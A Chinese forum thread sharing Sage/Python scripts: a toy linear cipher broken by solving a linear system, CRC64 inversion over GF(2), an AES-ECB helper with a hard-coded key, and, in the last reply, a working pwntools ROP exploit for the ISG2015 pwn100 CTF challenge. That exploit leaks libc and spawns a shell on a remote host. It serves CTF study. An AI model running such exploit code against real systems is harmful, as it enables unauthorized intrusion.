[原创]sage初探
发表于: 2015-12-13 19:32 8704

sage这个数学工具不错,在eclipse里面就可以执行,会点python和数学知识就可以耍起来。
写了个脚本贴这里以后好找。

import os
from sage.all import *

# Point the process environment at the local Sage 6.7 installation.
# NOTE(review): these assignments run after `from sage.all import *`, so they
# cannot influence that import. LD_LIBRARY_PATH is replaced, not extended, and
# a change made inside a running process normally only reaches child processes.
# PATH gets the Sage root prepended, so programs in that directory are found
# first; keep the directory writable only by its owner.
_sage_root = '/home/sage/sage-6.7'
os.environ['SAGE_ROOT'] = _sage_root
os.environ['PATH'] = _sage_root + ':' + os.environ['PATH']
os.environ['LD_LIBRARY_PATH'] = _sage_root + '/local/lib'

# Public text used to fill the coefficient matrix, one sentence per row.
sentences = [
    "ThelightTokeepinmindtheholylight",
    "Timeismoneymyfriend",
    "WelcometotheaugerRuiMa",
    "Areyouheretoplayforthehorde",
    "ToarmsyeroustaboutsWevegotcompany",
    "Ahhwelcometomyparlor",
    "Slaytheminthemastersname",
    "YesrunItmakesthebloodpumpfaster",
    "Shhhitwillallbeoversoon",
    "Kneelbeforemeworm",
    "Runwhileyoustillcan",
    "RisemysoldiersRiseandfightoncemore",
    "LifeismeaningleshThatwearetrulytested",
]

# S is an N x N table: row r holds the character codes of the first N
# characters of sentences[r]; positions past the end of a sentence stay 0.
N = 13
S = []
for line_no in range(N):
    codes = [ord(ch) for ch in sentences[line_no][:N]]
    S.append(codes + [0] * (N - len(codes)))
            
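# Toy "cipher": the ciphertext is the matrix-vector product M * key, where M is
# built from the sentence table S. The map is linear, so anyone who knows M and
# the ciphertext gets the key back by solving M * X = Y (last line below); the
# construction provides no confidentiality.
HEX_WIDTH = 5   # hex digits per ciphertext component

key = 'bbs.pediy.com'
M = Matrix(S)
print 'M is:\n', M      # M.rank() tells whether M * X = Y has a unique solution
X = vector(map(ord, key))
print 'Key is \'' + key + '\''

# Zero-padded fixed-width fields keep the chunking below aligned. The previous
# '%#6x' format emitted fewer than HEX_WIDTH digits for small components, which
# would shift every later field. Components wider than HEX_WIDTH digits are
# still not handled.
enc = ''.join(['%0*x' % (HEX_WIDTH, t) for t in M*X])
print 'Encrypted text is:\n', enc

# Split the hex string back into the components of Y and invert the linear map.
y = [int(enc[pos:pos + HEX_WIDTH], 16) for pos in range(0, len(enc), HEX_WIDTH)]
Y = vector(y)
print 'Key is \'' + ''.join(map(chr, M.solve_right(Y))) + '\''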

输出:
M is:
[ 84 104 101 108 105 103 104 116  84 111 107 101 101]
[ 84 105 109 101 105 115 109 111 110 101 121 109 121]
[ 87 101 108  99 111 109 101 116 111 116 104 101  97]
[ 65 114 101 121 111 117 104 101 114 101 116 111 112]
[ 84 111  97 114 109 115 121 101 114 111 117 115 116]
[ 65 104 104 119 101 108  99 111 109 101 116 111 109]
[ 83 108  97 121 116 104 101 109 105 110 116 104 101]
[ 89 101 115 114 117 110  73 116 109  97 107 101 115]
[ 83 104 104 104 105 116 119 105 108 108  97 108 108]
[ 75 110 101 101 108  98 101 102 111 114 101 109 101]
[ 82 117 110 119 104 105 108 101 121 111 117 115 116]
[ 82 105 115 101 109 121 115 111 108 100 105 101 114]
[ 76 105 102 101 105 115 109 101  97 110 105 110 103]
Key is 'bbs.pediy.com'
Encrypted text is:
1f359216982037e20d1e21ac9200dc204ba206a5207061f7d121b27211391fa57
Key is 'bbs.pediy.com'

    编译sage花几个小时,让eclipse执行sage脚本也比较麻烦,花了半天最后还是搞定了,发个贴留个纪念。

最新回复 (3)
#-*- coding:utf-8 -*-
import os
from sage.all import *
# Point the process environment at the local Sage 6.9 installation.
# NOTE(review): these assignments run after `from sage.all import *`, so they
# cannot influence that import. LD_LIBRARY_PATH is replaced, not extended, and
# a change made inside a running process normally only reaches child processes.
_sage_root = '/home/ty/sage-6.9'
os.environ['SAGE_ROOT'] = _sage_root
os.environ['PATH'] = _sage_root + ':' + os.environ['PATH']
os.environ['LD_LIBRARY_PATH'] = _sage_root + '/local/lib'

# Lookup table used by crc64() below: one 64-bit constant per value of the
# 8-bit index `(byte ^ register) & 0xff`, so 256 entries are expected
# (NOTE(review): entry count not verified here). The trailing `L` marks
# Python 2 long literals.
Qtable = [0x0, 0xb1aa069af3404101L, 0x7a66f79fc2063341, 0xcbccf10531467240L, 0xf4cdef3f840c6682L, 0x4567e9a5774c2783, 0x8eab18a0460a55c3L, 0x3f011e3ab54a14c2, 0xf0a924d52c9e7c47L, 0x4103224fdfde3d46, 0x8acfd34aee984f06L, 0x3b65d5d01dd80e07, 0x464cbeaa8921ac5, 0xb5cecd705bd25bc4L, 0x7e023c756a942984, 0xcfa83aef99d46885L, 0xf860b3007dba49cdL, 0x49cab59a8efa08cc, 0x8206449fbfbc7a8cL, 0x33ac42054cfc3b8d, 0xcad5c3ff9b62f4f, 0xbd075aa50af66e4eL, 0x76cbaba03bb01c0e, 0xc761ad3ac8f05d0fL, 0x8c997d55124358a, 0xb963914fa264748bL, 0x72af604a932206cb, 0xc30566d0606247caL, 0xfc0478ead5285308L, 0x4dae7e7026681209, 0x86628f75172e6049L, 0x37c889efe46e2148, 0xe9f39caadff222d9L, 0x58599a302cb263d8, 0x93956b351df41198L, 0x223f6dafeeb45099, 0x1d3e73955bfe445b, 0xac94750fa8be055aL, 0x6758840a99f8771a, 0xd6f282906ab8361bL, 0x195ab87ff36c5e9e, 0xa8f0bee5002c1f9fL, 0x633c4fe0316a6ddf, 0xd296497ac22a2cdeL, 0xed9757407760381cL, 0x5c3d51da8420791d, 0x97f1a0dfb5660b5dL, 0x265ba64546264a5c, 0x11932faaa2486b14, 0xa039293051082a15L, 0x6bf5d835604e5855, 0xda5fdeaf930e1954L, 0xe55ec09526440d96L, 0x54f4c60fd5044c97, 0x9f38370ae4423ed7L, 0x2e92319017027fd6, 0xe13a0b7f8ed61753L, 0x50900de57d965652, 0x9b5cfce04cd02412L, 0x2af6fa7abf906513, 0x15f7e4400ada71d1, 0xa45de2daf99a30d0L, 0x6f9113dfc8dc4290, 0xde3b15453b9c0391L, 0xcad5c3ff9b62f4f1L, 0x7b7fc5656822b5f0, 0xb0b334605964c7b0L, 0x11932faaa2486b1, 0x3e182cc01f6e9273, 0x8fb22a5aec2ed372L, 0x447edb5fdd68a132, 0xf5d4ddc52e28e033L, 0x3a7ce72ab7fc88b6, 0x8bd6e1b044bcc9b7L, 0x401a10b575fabbf7, 0xf1b0162f86bafaf6L, 0xceb1081533f0ee34L, 0x7f1b0e8fc0b0af35, 0xb4d7ff8af1f6dd75L, 0x57df91002b69c74, 0x32b570ffe6d8bd3c, 0x831f76651598fc3dL, 0x48d3876024de8e7d, 0xf97981fad79ecf7cL, 0xc6789fc062d4dbbeL, 0x77d2995a91949abf, 0xbc1e685fa0d2e8ffL, 0xdb46ec55392a9fe, 0xc21c542aca46c17bL, 0x73b652b03906807a, 0xb87aa3b50840f23aL, 0x9d0a52ffb00b33b, 0x36d1bb154e4aa7f9, 0x877bbd8fbd0ae6f8L, 0x4cb74c8a8c4c94b8, 0xfd1d4a107f0cd5b9L, 0x23265f554490d628, 0x928c59cfb7d09729L, 
0x5940a8ca8696e569, 0xe8eaae5075d6a468L, 0xd7ebb06ac09cb0aaL, 0x6641b6f033dcf1ab, 0xad8d47f5029a83ebL, 0x1c27416ff1dac2ea, 0xd38f7b80680eaa6fL, 0x62257d1a9b4eeb6e, 0xa9e98c1faa08992eL, 0x18438a855948d82f, 0x274294bfec02cced, 0x96e892251f428decL, 0x5d2463202e04ffac, 0xec8e65badd44beadL, 0xdb46ec55392a9fe5L, 0x6aeceacfca6adee4, 0xa1201bcafb2caca4L, 0x108a1d50086ceda5, 0x2f8b036abd26f967, 0x9e2105f04e66b866L, 0x55edf4f57f20ca26, 0xe447f26f8c608b27L, 0x2befc88015b4e3a2, 0x9a45ce1ae6f4a2a3L, 0x51893f1fd7b2d0e3, 0xe023398524f291e2L, 0xdf2227bf91b88520L, 0x6e88212562f8c421, 0xa544d02053beb661L, 0x14eed6baa0fef760, 0x8c997d55124358a1L, 0x3d337bcfe10319a0, 0xf6ff8acad0456be0L, 0x47558c5023052ae1, 0x7854926a964f3e23, 0xc9fe94f0650f7f22L, 0x23265f554490d62, 0xb398636fa7094c63L, 0x7c3059803edd24e6, 0xcd9a5f1acd9d65e7L, 0x656ae1ffcdb17a7, 0xb7fca8850f9b56a6L, 0x88fdb6bfbad14264L, 0x3957b02549910365, 0xf29b412078d77125L, 0x433147ba8b973024, 0x74f9ce556ff9116c, 0xc553c8cf9cb9506dL, 0xe9f39caadff222d, 0xbf353f505ebf632cL, 0x8034216aebf577eeL, 0x319e27f018b536ef, 0xfa52d6f529f344afL, 0x4bf8d06fdab305ae, 0x8450ea8043676d2bL, 0x35faec1ab0272c2a, 0xfe361d1f81615e6aL, 0x4f9c1b8572211f6b, 0x709d05bfc76b0ba9, 0xc1370325342b4aa8L, 0xafbf220056d38e8, 0xbb51f4baf62d79e9L, 0x656ae1ffcdb17a78, 0xd4c0e7653ef13b79L, 0x1f0c16600fb74939, 0xaea610fafcf70838L, 0x91a70ec049bd1cfaL, 0x200d085abafd5dfb, 0xebc1f95f8bbb2fbbL, 0x5a6bffc578fb6eba, 0x95c3c52ae12f063fL, 0x2469c3b0126f473e, 0xefa532b52329357eL, 0x5e0f342fd069747f, 0x610e2a15652360bd, 0xd0a42c8f966321bcL, 0x1b68dd8aa72553fc, 0xaac2db10546512fdL, 0x9d0a52ffb00b33b5L, 0x2ca05465434b72b4, 0xe76ca560720d00f4L, 0x56c6a3fa814d41f5, 0x69c7bdc034075537, 0xd86dbb5ac7471436L, 0x13a14a5ff6016676, 0xa20b4cc505412777L, 0x6da3762a9c954ff2, 0xdc0970b06fd50ef3L, 0x17c581b55e937cb3, 0xa66f872fadd33db2L, 0x996e991518992970L, 0x28c49f8febd96871, 0xe3086e8ada9f1a31L, 0x52a2681029df5b30, 0x464cbeaa8921ac50, 0xf7e6b8307a61ed51L, 0x3c2a49354b279f11, 
0x8d804fafb867de10L, 0xb28151950d2dcad2L, 0x32b570ffe6d8bd3, 0xc8e7a60acf2bf993L, 0x794da0903c6bb892, 0xb6e59a7fa5bfd017L, 0x74f9ce556ff9116, 0xcc836de067b9e356L, 0x7d296b7a94f9a257, 0x4228754021b3b695, 0xf38273dad2f3f794L, 0x384e82dfe3b585d4, 0x89e4844510f5c4d5L, 0xbe2c0daaf49be59dL, 0xf860b3007dba49c, 0xc44afa35369dd6dcL, 0x75e0fcafc5dd97dd, 0x4ae1e2957097831f, 0xfb4be40f83d7c21eL, 0x3087150ab291b05e, 0x812d139041d1f15fL, 0x4e85297fd80599da, 0xff2f2fe52b45d8dbL, 0x34e3dee01a03aa9b, 0x8549d87ae943eb9aL, 0xba48c6405c09ff58L, 0xbe2c0daaf49be59, 0xc02e31df9e0fcc19L, 0x718437456d4f8d18, 0xafbf220056d38e89L, 0x1e15249aa593cf88, 0xd5d9d59f94d5bdc8L, 0x6473d3056795fcc9, 0x5b72cd3fd2dfe80b, 0xead8cba5219fa90aL, 0x21143aa010d9db4a, 0x90be3c3ae3999a4bL, 0x5f1606d57a4df2ce, 0xeebc004f890db3cfL, 0x2570f14ab84bc18f, 0x94daf7d04b0b808eL, 0xabdbe9eafe41944cL, 0x1a71ef700d01d54d, 0xd1bd1e753c47a70dL, 0x601718efcf07e60c, 0x57df91002b69c744, 0xe675979ad8298645L, 0x2db9669fe96ff405, 0x9c1360051a2fb504L, 0xa3127e3faf65a1c6L, 0x12b878a55c25e0c7, 0xd97489a06d639287L, 0x68de8f3a9e23d386, 0xa776b5d507f7bb03L, 0x16dcb34ff4b7fa02, 0xdd10424ac5f18842L, 0x6cba44d036b1c943, 0x53bb5aea83fbdd81, 0xe2115c7070bb9c80L, 0x29ddad7541fdeec0, 0x9877abefb2bdafc1L]

def crc64(key):
    """Return the table-driven 64-bit CRC of the characters in *key*.

    The register starts at 0 and no final XOR is applied; each character is
    folded in through a Qtable lookup. The result is returned as a long.

    A CRC like this is a linear checksum, not a cryptographic hash, so it
    must not be relied on to hide or protect its input.
    """
    crc = 0
    for ch in key:
        # The low byte of the register, mixed with the next character, selects the entry.
        crc = (crc >> 8) ^ Qtable[(ord(ch) ^ crc) & 0xff]
    return long(crc)

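def crc64_(k):
    """Recompute crc64(k) with linear algebra over GF(2) instead of the table loop.

    Every character contributes 7 message bits. For each of them the CRC of a
    message with only that bit set is XORed with the CRC of the all-zero
    message, and the result becomes one column of a 64 x (7 * len(k)) matrix.
    Multiplying that matrix by the bit vector of *k* and XORing the all-zero
    CRC back in gives the same value as crc64(k). Because the CRC can be
    written this way, it can also be inverted by solving a linear system.

    The message length is taken from *k*; it is no longer fixed at 9.

    Args:
        k: string of 7-bit ASCII characters.

    Returns:
        The CRC value as an integer, equal to crc64(k).

    Raises:
        ValueError: if a character does not fit in 7 bits.
    """
    N = len(k)
    if any(ord(c) > 0x7f for c in k):
        # The matrix has only 7 columns per character.
        raise ValueError('crc64_ only handles 7-bit ASCII characters')
    M = MatrixSpace(GF(2), 64, N * 7)  # only 7 bits of each ASCII character are needed
    X = VectorSpace(GF(2), N * 7)
    base = crc64("\x00" * N)

    matrix = M()
    for i in range(N):
        for j in range(7):
            # Message with exactly one bit set: bit j of character i.
            probe = [0] * N
            probe[i] = 1 << j
            diff = crc64(''.join(map(chr, probe))) ^ base
            # Columns are ordered most significant bit first within a character.
            column = i * 7 + 6 - j
            for row in range(64):
                matrix[row, column] = (diff >> row) & 1

    # Bit vector of k, 7 bits per character, most significant bit first.
    xstr = ''.join(bin(ord(c)).replace('0b', '').rjust(7, '0') for c in k)
    x = X([int(n) for n in xstr])
    v = matrix * x
    # Row 0 is the least significant CRC bit, so reverse before parsing as binary.
    vstr = ''.join([repr(n) for n in v])[::-1]
    return int(vstr, 2) ^ base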

# The table loop and the GF(2) matrix form must give the same CRC.
table_crc = crc64('bbs.pediy')
algebra_crc = crc64_('bbs.pediy')
print table_crc == algebra_crc   # True
2015-12-14 23:03
#-*- coding:utf-8 -*-
import os
from sage.all import *
# Point the process environment at the local Sage 6.9 installation.
# NOTE(review): these assignments run after `from sage.all import *`, so they
# cannot influence that import. LD_LIBRARY_PATH is replaced, not extended, and
# a change made inside a running process normally only reaches child processes.
_sage_root = '/home/ty/sage-6.9'
os.environ['SAGE_ROOT'] = _sage_root
os.environ['PATH'] = _sage_root + ':' + os.environ['PATH']
os.environ['LD_LIBRARY_PATH'] = _sage_root + '/local/lib'

# Same lookup table as in the previous listing on this page; the middle entries
# are elided here ("..."), so the full table has to be pasted in before this
# script can run.
Qtable = [0x0,...,0x29ddad7541fdeec0, 0x9877abefb2bdafc1L]
N = 9 # len of key
# 64 equations (one per CRC bit) in N * 7 unknown message bits.
M = MatrixSpace(GF(2), 64, N * 7) # only 7 bits of each ASCII character need to be recovered
# Space holding the 64 bits of a CRC value.
V = VectorSpace(GF(2), 64)

def crc64(key):
    """Return the table-driven 64-bit CRC of the characters in *key*.

    The register starts at 0 and no final XOR is applied; each character is
    folded in through a Qtable lookup. The result is returned as a long.

    A CRC like this is a linear checksum, not a cryptographic hash, so it
    must not be relied on to hide or protect its input.
    """
    crc = 0
    for ch in key:
        # The low byte of the register, mixed with the next character, selects the entry.
        crc = (crc >> 8) ^ Qtable[(ord(ch) ^ crc) & 0xff]
    return long(crc)

# Recover an N-character message from its CRC alone. That this works is the
# reason a CRC must never be used where preimage resistance is needed
# (password storage, tamper protection against a deliberate adversary).

# CRC of N zero bytes: the constant term of the message -> CRC map.
base = crc64("\x00" * N)

# diffs[i, j] is the CRC change caused by setting only bit j of character i;
# the same value, bit by bit, fills one column of the 64 x (7 * N) matrix.
diffs = {}
matrix = M()
for char_idx in range(N):
    for bit_idx in range(7):
        probe = [0] * N
        probe[char_idx] |= 1 << bit_idx
        delta = crc64(''.join(map(chr, probe))) ^ base
        diffs[char_idx, bit_idx] = delta
        # Most significant bit of a character comes first among its 7 columns.
        col = char_idx * 7 + (6 - bit_idx)
        for bit_row in range(64):
            matrix[bit_row, col] = (delta >> bit_row) & 1

# Target CRC with the constant term removed, as a vector over GF(2).
DIFFERENCE = 0x82a320d616b5ef03L ^ base   # hex(crc64('bbs.pediy'))
v = V([(DIFFERENCE >> bit_row) & 1 for bit_row in range(64)])
x = matrix.solve_right(v)

# Regroup the solved bits into 7-bit characters.
xstr = ''.join(repr(bit) for bit in x)
key = ''.join(chr(int(xstr[pos:pos + 7], 2)) for pos in range(0, len(xstr), 7))
print key  #bbs.pediy

超过9个字符时解不唯一:每个字符贡献7个未知比特,9个字符共63个未知量,而64位CRC只给出64个方程;到10个字符就有70个未知量,方程组欠定。
2015-12-14 23:14
python脚本收藏
#-*- coding:utf-8 -*-
from Crypto.Cipher import AES

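def decrypt(enc,C_k):
    """Decrypt a hex-encoded AES-ECB ciphertext and strip its padding.

    Args:
        enc: ciphertext as a hex string, as produced by encrypt().
        C_k: key string; keys shorter than 32 characters are extended with '0'.

    Returns:
        The plaintext decoded from UTF-8.

    Raises:
        ValueError: if the ciphertext is empty or the padding is malformed.

    NOTE(review): security limitations kept for compatibility with existing
    ciphertexts. ECB encrypts equal plaintext blocks to equal ciphertext
    blocks and the data carries no integrity check. Extending the key with
    '0' characters adds no secrecy: a 16-character key gives an AES-256 key
    whose second half is known. New data should use an authenticated mode
    with a key from a proper key-derivation function.
    """
    key=C_k
    while len(key)<32: key+='0'
    key=unicode(key,'utf-8').encode('utf-8')
    raw=enc.decode('hex')
    cipher = AES.new(key, AES.MODE_ECB)
    txt=cipher.decrypt(raw)
    if not txt:
        raise ValueError('empty ciphertext')
    # Check the padding before stripping it. Slicing by an unchecked last byte
    # silently returned '' (pad value 0) or a wrongly truncated text.
    padnum=ord(txt[-1])
    if padnum<1 or padnum>AES.block_size or txt[-padnum:]!=chr(padnum)*padnum:
        raise ValueError('invalid padding')
    return txt[:-padnum].decode('utf-8')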
           
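def encrypt(phone,C_k):
    """Encrypt *phone* with AES-ECB and return the ciphertext as a hex string.

    Args:
        phone: plaintext string (UTF-8).
        C_k: key string; keys shorter than 32 characters are extended with '0'.

    Returns:
        Hex encoding of the ciphertext.

    NOTE(review): security limitations kept for compatibility with existing
    ciphertexts. ECB is deterministic, so the same phone number always gives
    the same ciphertext and equal blocks are visible; nothing authenticates
    the data. Extending the key with '0' characters adds no secrecy. New data
    should use an authenticated mode with a key from a proper key-derivation
    function.
    """
    key=C_k
    while len(key)<32: key+='0'
    key=unicode(key,'utf-8').encode('utf-8')
    p=unicode(phone,'utf-8').encode('utf-8')
    # Pad to the next block boundary; an input that already ends on a boundary
    # gets a whole extra block. The previous `block_size - len(p)` was only
    # correct for inputs shorter than one block: 16 bytes got no padding and
    # longer inputs a negative pad value.
    padnum=AES.block_size-len(p)%AES.block_size
    p+=chr(padnum)*padnum
    cipher = AES.new(key, AES.MODE_ECB)
    return cipher.encrypt(p).encode('hex')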

# Round-trip demo: encrypt a sample number, print the hex ciphertext, then
# print what decrypt() gives back.
# NOTE(review): the key is a literal in the source, so anyone who can read the
# script can decrypt; real keys belong in a secret store, not in code.
C_k = 'sdtyffdftesfyfdw'
enc = encrypt('13249582075', C_k)
print enc
roundtrip = decrypt(enc, C_k)
print roundtrip

'''
输出结果:
9613613dfc2eb43aee0f5df79f3c1d4e
13249582075
'''

#ISG2015 pwn100
from pwn import *
# Solution script for a CTF challenge binary ('pwnme'): it connects to the
# challenge service and sends two return-oriented payloads.
#
# NOTE(review), inferred from the script only (the binary is not shown here):
# the approach depends on (a) a return address reachable at a fixed offset from
# the input buffer (20 and 12 filler bytes below), (b) fixed code addresses in
# the binary (`main` is hard-coded), and (c) a disclosed libc address. Building
# with stack protectors and as a position-independent executable, plus bounds
# checking the read that fills the buffer, removes those preconditions.
context(arch='i386', os='linux')
conn = remote('202.120.7.145', 9991)
elf = ELF('pwnme')
# Hard-coded address that both chains return to afterwards.
main = 0x804847d
rop=ROP(elf)
# First chain: write(1, <GOT entry of __libc_start_main>, 4), then back to `main`.
rop.call('write', [1,elf.got['__libc_start_main'],4])
rop.call(main)
# The chain is placed at offset 20 of the payload, filler 'A' before it.
payload = fit({20:rop.chain()},filler = 'A')
conn.send(payload+'\n')
# 45 bytes are read and printed first, presumably the program's own output - confirm.
print conn.recvn(45)
# The next 4 bytes are unpacked as the runtime address of __libc_start_main.
startmainva = unpack(conn.recvn(4))
libc = ELF('libc-2.19.so')   
# Other libc addresses follow from that one by symbol-offset differences in
# this exact libc build (libc-2.19.so).
systemva = startmainva+ libc.symbols['system']-libc.symbols['__libc_start_main']
shellva = startmainva + next(libc.search('/bin/sh\x00'))-libc.symbols['__libc_start_main']
# Second chain: call the computed `system` address with the computed string
# address, then return to `main`; this time the chain sits at offset 12.
rop=ROP(elf)
rop.call(systemva, [shellva])
rop.call(main)
payload = fit({12:rop.chain()},filler = 'C')
conn.send(payload+'\n')
# Hand the connection over to the terminal.
conn.interactive()
2015-12-21 12:01